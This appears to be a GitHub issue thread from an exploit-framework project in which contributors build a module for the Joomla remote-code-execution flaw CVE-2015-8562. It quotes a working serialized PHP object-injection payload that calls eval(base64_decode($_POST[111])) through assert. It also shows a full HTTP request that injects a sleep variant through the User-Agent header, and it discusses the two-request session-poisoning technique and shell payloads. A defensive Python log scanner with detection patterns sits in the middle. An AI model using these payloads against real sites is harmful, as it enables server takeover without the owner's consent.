
[Request] Critical 0day RCE in Joomla (CVE-2015-8562) #6347

Closed
madmike33 opened this issue Dec 14, 2015 · 104 comments
Labels
feature hotness module

Comments

madmike33 commented Dec 14, 2015

@jvoisin, are you interested, mate?

This is a serious vulnerability that can be easily exploited and is already in the wild. http://hubs.ly/H01B2K20

wvu (Contributor) commented Dec 14, 2015

Thank you, @madmike33. Looks much better, lol.

madmike33 (Author) commented Dec 14, 2015

Agree 😁

madmike33 reopened this Dec 14, 2015

madmike33 (Author) commented Dec 14, 2015

@wvu-r7, how about some labels?

wvu added the module, hotness and feature labels Dec 14, 2015

firefart (Contributor) commented Dec 14, 2015

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6

firefart (Contributor) commented Dec 14, 2015

wvu (Contributor) commented Dec 14, 2015

@brandonprry ^

madmike33 (Author) commented Dec 14, 2015

@firefart thank you, interesting. It's all about uploading the payload in the tokens, if I am not wrong.

firefart (Contributor) commented Dec 14, 2015

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry

brandonprry (Contributor) commented Dec 14, 2015

I am very close, give me an hour or so.

madmike33 (Author) commented Dec 14, 2015

@brandonprry waiting to be the first one to test it :)

firefart (Contributor) commented Dec 14, 2015

@brandonprry great! I need to get some sleep; I will check it tomorrow morning, in about 6 hours.

brandonprry (Contributor) commented Dec 15, 2015

It takes two requests:

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}𝌆
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. The intent is obvious, but something seems to be missing...

brandonprry (Contributor) commented Dec 15, 2015

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

kendyhikaru commented Dec 15, 2015

@brandonprry waiting for your info.

brandonprry (Contributor) commented Dec 15, 2015

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}
Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.

brandonprry (Contributor) commented Dec 15, 2015

They are not related.

EDIT: I might have spoken too soon.

firefart (Contributor) commented Dec 15, 2015

@brandonprry so that's exactly how far I got :(

wvu (Contributor) commented Dec 15, 2015

I poked at this on my own... and got equally as far, lol.

wvu (Contributor) commented Dec 15, 2015

Think I got it.

firefart (Contributor) commented Dec 15, 2015

So it seems the exploit works like some kind of session injection. It puts in a new session identifier, __test (instead of the normal __default), with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479
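The pieces the thread has identified so far (a serialized PHP object carried in a client-controlled header, a `}` and `|` that close the stored browser string and open a new `__test` session key, and the 4-byte UTF-8 character that ends the quoted payload) are exactly what a defender wants to spot in web-server logs and inbound requests. The detector below is an added example for this page, not code from the thread, from Joomla or from the Metasploit module; it assumes Apache combined log format, the three log lines it parses are constructed, the indicator names are my own, and it inspects User-Agent and X-Forwarded-For because those are the two headers the thread mentions as injection points.

```python
import re
from typing import Dict, List

# Constructed Apache combined-log sample (not taken from the thread). The second line carries a
# User-Agent shaped like the serialized-object payload quoted above, with Apache's usual escaping:
# embedded quotes as \" and non-printable bytes as \xHH.
SAMPLE_LOG = r'''
192.0.2.10 - - [14/Dec/2015:18:06:35 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0"
192.0.2.11 - - [14/Dec/2015:18:06:36 +0000] "GET / HTTP/1.1" 500 0 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:18:\"disconnectHandlers\";a:1:{i:0;s:4:\"init\";}}\xf0\x9d\x8c\x86"
192.0.2.12 - - [14/Dec/2015:18:06:37 +0000] "GET /index.php HTTP/1.1" 200 4987 "-" "curl/7.45.0"
'''

# Combined log format; quoted fields may contain backslash-escaped characters.
_QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + _QUOTED + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"$'
)

# Client-controlled headers that end up in the stored session (both are named in the thread).
CLIENT_HEADERS = ("User-Agent", "X-Forwarded-For")


def unescape_log_field(field: str) -> str:
    """Undo Apache's quoted-field escaping (backslash-quote, backslash-backslash and
    backslash-xHH byte escapes), then decode the resulting bytes as UTF-8."""
    out = bytearray()
    i = 0
    while i < len(field):
        if field[i] == "\\" and i + 1 < len(field):
            nxt = field[i + 1]
            if nxt == "x" and re.fullmatch(r"[0-9a-fA-F]{2}", field[i + 2:i + 4]):
                out += bytes([int(field[i + 2:i + 4], 16)])
                i += 4
                continue
            out += nxt.encode("utf-8")
            i += 2
            continue
        out += field[i].encode("utf-8")
        i += 1
    return out.decode("utf-8", errors="replace")


def indicators(value: str) -> List[str]:
    """Return the session-injection indicators present in one decoded header value."""
    checks = [
        ("serialized_object", lambda v: re.search(r'O:\d+:"', v) is not None),
        ("serialized_array", lambda v: re.search(r'a:\d+:\{', v) is not None),
        # '}' closing the previous value, then a bare key name and '|' opening a new session key
        ("session_key_separator", lambda v: re.search(r'\}\w*\|', v) is not None),
        ("control_char", lambda v: any(ord(c) < 0x20 or ord(c) == 0x7F for c in v)),
        # code points above U+FFFF take 4 bytes in UTF-8; the quoted payload ends with one
        ("astral_utf8", lambda v: any(ord(c) > 0xFFFF for c in v)),
    ]
    return [name for name, test in checks if test(value)]


def scan_request(headers: Dict[str, str]) -> Dict[str, List[str]]:
    """Check the client-controlled headers of one request; returns {header: indicators} for hits."""
    lowered = {k.lower(): v for k, v in headers.items()}
    hits: Dict[str, List[str]] = {}
    for name in CLIENT_HEADERS:
        value = lowered.get(name.lower())
        if value is None:
            continue
        found = indicators(value)
        if found:
            hits[name] = found
    return hits


def scan_access_log(text: str) -> List[dict]:
    """Parse combined-format log lines and return the requests whose User-Agent looks injected."""
    results = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ua = unescape_log_field(m.group("ua"))
        found = indicators(ua)
        if found:
            results.append({"ip": m.group("ip"), "status": m.group("status"),
                            "ua": ua, "indicators": found})
    return results


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["indicators"])
```

Any single indicator can be noise in a large log (a `|` in a User-Agent is unusual but not impossible), so the scan reports the whole list rather than a verdict; a serialized-object marker together with the key separator is the combination worth paging on. The 500 responses the thread observed on the follow-up request are a useful second signal to correlate against the same client address.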

wvu (Contributor) commented Dec 15, 2015

Gonna put together a PoC... hope it's not a fluke!

firefart (Contributor) commented Dec 15, 2015

@wvu-r7 👯 so send it over for testing :D

wvu (Contributor) commented Dec 15, 2015

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

madmike33 (Author) commented Dec 15, 2015

So, anything new so far, guys? The thing is in the payload; according to Sucuri they modified the payload. @wchen-r7, any idea from your side too?

wvu (Contributor) commented Dec 15, 2015

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

icehteam commented Dec 15, 2015

Anybody with good knowledge of OOP can execute this; I'm still trying. Anyone using Skype? Add me: base64_decode('bXIuY2h1cmNobDMzdA=='); lol

madmike33 (Author) commented Dec 15, 2015

Yes, it's a good idea; we can make a group and everyone can give his idea in Skype @icehteam

cyadron commented Dec 15, 2015

@shargon Do you mean that the next time you reload that page, session info is read from the database and deserialized, and the object is executed?

shargon commented Dec 15, 2015

@cyadron yes, I thought it is like this: to run the exploit it's necessary to make 2 calls, one for the poison, two for the execution.

The execution part is simple: Joomla deserializes the session and runs the poison...

The hard work is making the correct payload to exploit it.

madmike33 (Author) commented Dec 15, 2015

Yes, what @cyadron said is true; we need two calls, as @brandonprry stated earlier.

firefart (Contributor) commented Dec 15, 2015

Guys, please use IRC or Skype for discussing this exploit; this issue is getting too big and too off-topic.

icehteam commented Dec 15, 2015

My Skype is base64_decode('bXIuY2h1cmNobDMzdA=='); let me know yours, folks.

shargon commented Dec 15, 2015

http://www.freebuf.com/vuls/89754.html <- Solved

madmike33 (Author) commented Dec 15, 2015

👍 @shargon

cyadron commented Dec 15, 2015

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

borismattijssen commented Dec 15, 2015

Edit: I decided to remove the screenshot, as I just posted it out of excitement, not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

jstnkndy (Contributor) commented Dec 15, 2015

@borismattijssen What's the purpose of posting a screenshot but no technical details?

borismattijssen commented Dec 15, 2015

@jstnkndy I feel like the vulnerability is too young to share the technical details on the internet..

firefart (Contributor) commented Dec 15, 2015

lol

jstnkndy (Contributor) commented Dec 15, 2015

so the screenshot is just.... bragging?

borismattijssen commented Dec 15, 2015

just showing it isn't that hard..

falconz commented Dec 15, 2015

@borismattijssen I see the vulnerability is in User-Agent or X-Forwarded-For; why did you hide the URI?

HackerOnTwoWheels commented Dec 15, 2015

@falconz my guess: it is not a private address, lol

firefart (Contributor) commented Dec 15, 2015

Closing this because the details are publicly available and a module is also ready.

wchen-r7 (Contributor) commented Dec 15, 2015

@firefart In your commit, I recommend just doing "Resolve #6347". That way, when your PR lands, it automatically tags and closes this issue. And if you want to end the conversation early, I guess we can try to lock it (there is a button for that on my side).

wvu (Contributor) commented Dec 17, 2015

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

wchen-r7 changed the title from "[Request] Critical 0day RCE in joomla" to "[Request] Critical 0day RCE in Joomla (CVE-2015-8562)" Dec 17, 2015

s1m096 commented Dec 18, 2015

Does not work with me...

ggg4566 commented Dec 19, 2015

Does not work on versions below 3.x; need to find another trick.

bgeesaman commented Dec 20, 2015

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

JohnMartinelli commented Dec 20, 2015

If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY FOR CODING THE FIXES, as I have never contributed to an open source project (a big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

icehteam commented Dec 20, 2015

@ggg4566 X-Forwarded-For is working in 3.x; you need to use User-Agent for some versions. @JohnMartinelli you're late to the party fff...

adrian-rt commented Dec 21, 2015

I've read that a session_decode() bug is needed for this to work...? Can anyone please tell me what that bug is about?

VivekShingala commented Oct 6, 2017

Is this error harmful for other frameworks like CodeIgniter or core PHP websites? I have found these logs in such frameworks. I do not use Joomla for most of the sites; however, I still find these logs.

If yes, what steps should be taken to prevent it?
